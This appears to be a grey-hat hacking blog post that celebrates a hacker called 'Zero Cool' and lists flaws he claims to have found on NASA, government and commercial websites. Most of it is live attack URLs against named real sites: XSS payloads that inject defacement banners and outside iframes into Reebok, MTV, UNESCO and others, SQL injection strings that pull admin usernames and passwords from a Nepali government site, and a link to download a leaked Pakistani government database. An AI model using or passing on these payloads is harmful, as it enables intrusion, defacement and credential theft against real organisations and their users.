
NASA Sub-domain is Vulnerable Allowing Information Disclosure

NASA Sub-domain is Vulnerable Allowing Serious Information Disclosure

The National Aeronautics and Space Administration, widely known as NASA, has long fascinated hackers looking to breach its security systems. Many of our readers may be astonished after reading the above lines, but it's a fact, and history bears witness to it. So far NASA has been targeted several times, with hackers finding vulnerabilities and penetrating its digital security. The same thing has happened again: an ethical hacker from India going by the name of "Zero Cool" found serious loopholes in one of NASA's sub-domains that could lead to disclosure of sensitive information. The hacker shared a vulnerability report with us showing that, by exploiting the vulnerability, a malicious attacker could easily extract a large amount of confidential data from the NASA server, such as source code of various programs (used by NASA), current project information, future research papers, topological graphs, license information, several executable files, .dll files, private application software and its source code, employee details and much other highly confidential, or in other words "Top Secret", data and files. For security and privacy reasons we are not disclosing the vulnerable links, but exclusively for VOGH readers we are sharing a few images to justify the fact.



This vulnerability report has already been submitted to NASA, and as expected they reacted immediately and promised to patch those loopholes with immediate effect. While talking about the ethical hacker "Zero", we would like to remind you that before this NASA vulnerability disclosure he exposed several vulnerabilities in many major, high-profile websites such as Facebook, Reebok, Indiagames, mtv, lapdonline, UNESCO, Toshiba, Discovery.com, Novell.com, Microsoft Store India, several Pakistani and Bangladeshi Govt websites and many more.





toshiba-india.com is Vulnerable to SQL-i


The official website of Toshiba India is vulnerable to SQL injection (SQL-i). This vulnerability was found by Zero Cool.

Vulnerable Website:-


Vulnerable  Link:-


Databases:-


Discovery.com Vulnerable to XSS Said Zero


Zero Cool found a non-persistent XSS vulnerability on the official website of Discovery.

Vulnerable Website:-


Vulnerable Link:-


http://news.discovery.com/search/results.html?focus=site&query=%3E%22%3E%3CMARQUEE%3EHACKED+BY+ZERO+COOL%3C%2FMARQUEE%3E%3Ciframe%2Bsrc%2B%253D%22http%253A%252F%252Fwww.indishell.in%22%2Bwidth%253D%22100%2525%22%2Bheight%253D%22100%2525%22%3E%3C%252Fiframe%3E%26Submit%3DGo&search.x=37&search.y=14&search=search


Trinity Campus & Adonai Technologies Hacked by ZERO


2 Pakistani Websites hacked by Zero


Human Rights Commission of Pakistan SQL-i Vulnerable


The website of the Human Rights Commission of Pakistan is vulnerable to SQL-i attacks.
This vulnerability was found by Zero Cool.


Vulnerable Link:-
http://www.hrcp-web.org/showdocument.asp?id=23%27


Federal Revenue of Pakistan Govt. is Vulnerable to SQL-i


The Federal Revenue website of the Pakistan Govt. is vulnerable to SQL-i attack. The vulnerability was found by Zero Cool.

Vulnerable Site:- 
http://n.fbr.gov.pk/

Click Here to Download the Database:-
http://pastebin.com/AbEVQx3X



XSS in UK Gov sites found by Zero Cool


Nepal GOV site is SQL-i vulnerable


A Govt. site of Nepal is vulnerable to SQL-i; the flaws were detected by Zero Cool.

Vulnerable Website:-
http://www.nationalmuseum.gov.np/



Vulnerable Link:-
link :=http://www.nationalmuseum.gov.np/news.php?id=2+union+select+group_concat%28id,0x3a,username,0x3a,password%29,2,3+FROM+admin--

Zero Cool also found one more Nepali site vulnerable to SQL-i, and here is the vulnerable link to the database:-

link:=http://www.katjazz.com.np/news.php?id=-55+union+select+1,2,group_concat%28id,0x3a,name,0x3a,mail%29,4,5+FROM+kjc_list--


XSS in Bangladesh Bank's Website


A non-persistent XSS in www.bangladesh-bank.org was found by XSS master Zero Cool.


XSS vulnerability on National Space Agency Pakistan & Pak Gov Radio's Websites



The website of the National Space Agency of Pakistan is vulnerable to XSS.
Website link:-
http://www.suparco.gov.pk/




Also, the official website of the Pakistani Govt. radio station is vulnerable to XSS attack.
Website link:-
www.radio.gov.pk


These 2 vulnerabilities were found by XSS master Zero Cool.


Ministry of Food and Agriculture's website of Pakistan is SQL-i Vulnerable



An SQL-i vulnerability was found by Zero Cool on the website of Pakistan's Ministry of Food and Agriculture.


Website Link:- 
http://www.minfa.gov.pk


Non-persistent XSS Vulnerability in Pakistan Railway's Site



A non-persistent XSS vulnerability in www.pakrail.com was found by Zero Cool.




XSS vulnerability found by Zero Cool on (reebok,indiagames,mtv,lapdonline,unesco,pcboard)


XSS vulnerabilities found by Zero Cool on:
reebok.com
bsnl1.indiagames.com
www.lapdonline.org
whc.unesco.org
cricket.com.au




http://www.reebok.com/IN/search?t=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Ciframe+src+%3D%22http://www.voiceofgreyhat.com/2011/04/xss-vulnerability-found-by-zero-cool.html%22+width%3D%22100%25%22+height%3D%22100%25%22%3E%3C%2Fiframe%3E&Submit=Go




http://bsnl1.indiagames.com/bpremium/index.jsp  


vul link= [put the code in the search bar] >"><MARQUEE>HACKED BY ZERO COOL</MARQUEE><img src="http://img204.imageshack.us/img204/1322/zeropk.png" img>




http://www.lapdonline.org/ 


vul link=  http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Cimg%20src=%22http://img204.imageshack.us/img204/1322/zeropk.png%22%20img%3E




http://www.mtv.co.uk/


vul link = http://www.mtv.co.uk/search?k=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Cimg%20src=%22http://img204.imageshack.us/img204/1322/zeropk.png%22%20img%3E&op=Search




http://www.pcboard.com.pk/
vul link=  [put the code in the search bar] >"><MARQUEE>HACKED BY ZERO COOL</MARQUEE><img src="http://img204.imageshack.us/img204/1322/zeropk.png" img>




http://whc.unesco.org/


vul link =http://whc.unesco.org/en/list/?search=%3E%22%3E%3CMARQUEE%3EHACKED+BY+ZERO+COOL%3C%2FMARQUEE%3E%3Cimg+src%3D%22http%3A%2F%2Fimg204.imageshack.us%2Fimg204%2F1322%2Fzeropk.png%22+img%3E&searchSites=&search_by_country=&search_yearinscribed=&type=&themes=&media=&region=&criteria_restrication=&order=


An HTML injection vulnerability in cricket.com.au was also found by Zero Cool.




http://cricket.com.au/searchresult/%3Cimg%20src=%22http://fc09.deviantart.net/fs30/i/2009/252/e/e/Zero_Wallpaper_4_by_Zero1122.jpg%22%20%3C/img%3E


XSS vulnerability found by zero cool
